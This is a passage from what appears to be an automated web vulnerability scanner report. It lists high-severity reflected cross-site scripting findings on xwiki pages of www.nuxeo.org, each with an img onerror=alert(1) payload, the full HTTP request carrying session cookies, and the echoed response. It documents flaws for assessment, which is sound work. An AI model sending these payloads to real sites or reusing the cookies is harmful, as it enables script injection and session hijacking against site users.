Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b693d<img%20src%3da%20onerror%3dalert(1)>f1870ce447f was submitted in the REST URL parameter 5. This input was echoed as b693d<img src=a onerror=alert(1)>f1870ce447f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookAdminMovedb693d<img%20src%3da%20onerror%3dalert(1)>f1870ce447f HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:19 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12950
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMovedb693d%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ef1870ce447f'>BookAdminMovedb693d<img src=a onerror=alert(1)>f1870ce447f</a>
...[SNIP]...

4.472. http://www.nuxeo.org/xwiki/bin/view/Main/BookAdminMoved [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookAdminMoved

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfca7"><img%20src%3da%20onerror%3dalert(1)>92f1ed54814 was submitted in the REST URL parameter 5. This input was echoed as cfca7"><img src=a onerror=alert(1)>92f1ed54814 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookAdminMovedcfca7"><img%20src%3da%20onerror%3dalert(1)>92f1ed54814 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:33 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13012
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/BookAdminMovedcfca7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E92f1ed54814?format=xar&amp;name=Main.BookAdminMovedcfca7"><img src=a onerror=alert(1)>92f1ed54814&amp;pages=Main.BookAdminMovedcfca7">
...[SNIP]...

4.473. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94b55<img%20src%3da%20onerror%3dalert(1)>bdb277e3df2 was submitted in the REST URL parameter 4. This input was echoed as 94b55<img src=a onerror=alert(1)>bdb277e3df2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main94b55<img%20src%3da%20onerror%3dalert(1)>bdb277e3df2/BookEPMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:20 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12923
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main94b55%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ebdb277e3df2/">Main94b55<img src=a onerror=alert(1)>bdb277e3df2</a>
...[SNIP]...

4.474. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8b6e"><img%20src%3da%20onerror%3dalert(1)>7640e37c755 was submitted in the REST URL parameter 4. This input was echoed as e8b6e"><img src=a onerror=alert(1)>7640e37c755 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Maine8b6e"><img%20src%3da%20onerror%3dalert(1)>7640e37c755/BookEPMoved HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:28 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12989
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Maine8b6e%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E7640e37c755/BookEPMoved?format=xar&amp;name=Maine8b6e"><img src=a onerror=alert(1)>7640e37c755.BookEPMoved&amp;pages=Maine8b6e">
...[SNIP]...

4.475. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a5c7c<img%20src%3da%20onerror%3dalert(1)>66b831a0a72 was submitted in the REST URL parameter 5. This input was echoed as a5c7c<img src=a onerror=alert(1)>66b831a0a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookEPMoveda5c7c<img%20src%3da%20onerror%3dalert(1)>66b831a0a72 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12911
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoveda5c7c%3Cimg+src%3Da+onerror%3Dalert%281%29%3E66b831a0a72'>BookEPMoveda5c7c<img src=a onerror=alert(1)>66b831a0a72</a>
...[SNIP]...

4.476. http://www.nuxeo.org/xwiki/bin/view/Main/BookEPMoved [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/BookEPMoved

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53fbe"><img%20src%3da%20onerror%3dalert(1)>e2db809e87b was submitted in the REST URL parameter 5. This input was echoed as 53fbe"><img src=a onerror=alert(1)>e2db809e87b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/BookEPMoved53fbe"><img%20src%3da%20onerror%3dalert(1)>e2db809e87b HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:08 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12973
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/BookEPMoved53fbe%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ee2db809e87b?format=xar&amp;name=Main.BookEPMoved53fbe"><img src=a onerror=alert(1)>e2db809e87b&amp;pages=Main.BookEPMoved53fbe">
...[SNIP]...

4.477. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9ac20<img%20src%3da%20onerror%3dalert(1)>34b3d0cb59f was submitted in the REST URL parameter 4. This input was echoed as 9ac20<img src=a onerror=alert(1)>34b3d0cb59f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main9ac20<img%20src%3da%20onerror%3dalert(1)>34b3d0cb59f/CMIS HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:51 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12832
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main9ac20%3Cimg+src%3Da+onerror%3Dalert%281%29%3E34b3d0cb59f/">Main9ac20<img src=a onerror=alert(1)>34b3d0cb59f</a>
...[SNIP]...

4.478. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d639"><img%20src%3da%20onerror%3dalert(1)>4b8cf8e51bb was submitted in the REST URL parameter 4. This input was echoed as 6d639"><img src=a onerror=alert(1)>4b8cf8e51bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main6d639"><img%20src%3da%20onerror%3dalert(1)>4b8cf8e51bb/CMIS HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:15:58 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12898
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main6d639%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E4b8cf8e51bb/CMIS?format=xar&amp;name=Main6d639"><img src=a onerror=alert(1)>4b8cf8e51bb.CMIS&amp;pages=Main6d639">
...[SNIP]...

4.479. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ef7"><img%20src%3da%20onerror%3dalert(1)>13a548dc1df was submitted in the REST URL parameter 5. This input was echoed as 38ef7"><img src=a onerror=alert(1)>13a548dc1df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/CMIS38ef7"><img%20src%3da%20onerror%3dalert(1)>13a548dc1df HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:17:29 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12882
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main/CMIS38ef7%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E13a548dc1df?format=xar&amp;name=Main.CMIS38ef7"><img src=a onerror=alert(1)>13a548dc1df&amp;pages=Main.CMIS38ef7">
...[SNIP]...

4.480. http://www.nuxeo.org/xwiki/bin/view/Main/CMIS [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/CMIS

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 95275<img%20src%3da%20onerror%3dalert(1)>692dc4b9251 was submitted in the REST URL parameter 5. This input was echoed as 95275<img src=a onerror=alert(1)>692dc4b9251 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/CMIS95275<img%20src%3da%20onerror%3dalert(1)>692dc4b9251 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:18:30 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12820
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href='http://www.nuxeo.org/xwiki/bin/view/Main/CMIS95275%3Cimg+src%3Da+onerror%3Dalert%281%29%3E692dc4b9251'>CMIS95275<img src=a onerror=alert(1)>692dc4b9251</a>
...[SNIP]...

4.481. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ae2d<img%20src%3da%20onerror%3dalert(1)>460174238d1 was submitted in the REST URL parameter 4. This input was echoed as 2ae2d<img src=a onerror=alert(1)>460174238d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main2ae2d<img%20src%3da%20onerror%3dalert(1)>460174238d1/ContributionSpace HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:14:42 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13001
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/view/Main2ae2d%3Cimg+src%3Da+onerror%3Dalert%281%29%3E460174238d1/">Main2ae2d<img src=a onerror=alert(1)>460174238d1</a>
...[SNIP]...

4.482. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 434b1"><img%20src%3da%20onerror%3dalert(1)>a501731b55d was submitted in the REST URL parameter 4. This input was echoed as 434b1"><img src=a onerror=alert(1)>a501731b55d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main434b1"><img%20src%3da%20onerror%3dalert(1)>a501731b55d/ContributionSpace HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:13:41 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 13067
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...
<a href="http://www.nuxeo.org/xwiki/bin/export/Main434b1%22%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3Ea501731b55d/ContributionSpace?format=xar&amp;name=Main434b1"><img src=a onerror=alert(1)>a501731b55d.ContributionSpace&amp;pages=Main434b1">
...[SNIP]...

4.483. http://www.nuxeo.org/xwiki/bin/view/Main/ContributionSpace [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nuxeo.org
Path:   /xwiki/bin/view/Main/ContributionSpace

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 61c31<img%20src%3da%20onerror%3dalert(1)>d24e0bc59b3 was submitted in the REST URL parameter 5. This input was echoed as 61c31<img src=a onerror=alert(1)>d24e0bc59b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /xwiki/bin/view/Main/ContributionSpace61c31<img%20src%3da%20onerror%3dalert(1)>d24e0bc59b3 HTTP/1.1
Host: www.nuxeo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=8CE080C4E3D2723E9AFB284F4D8A6A8F; visitid=JCQCZPBZFRBBEUMQU3NXVQKQ1MINOJUP; __utmz=264442000.1289829491.1.1.utmcsr=sfwk.org|utmccn=(referral)|utmcmd=referral|utmcct=/Community/SeamInProduction; __utma=264442000.2041949577.1289829491.1289829491.1289829491.1; __utmc=264442000; __utmb=264442000.1.10.1289829491; visitor_id1304=295927563; MTCCK=1;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 14:16:31 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Content-Length: 12989
Via: 1.1 doc.nuxeo.org
Vary: Accept-Encoding
Via: 1.1 www.nuxeo.org
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
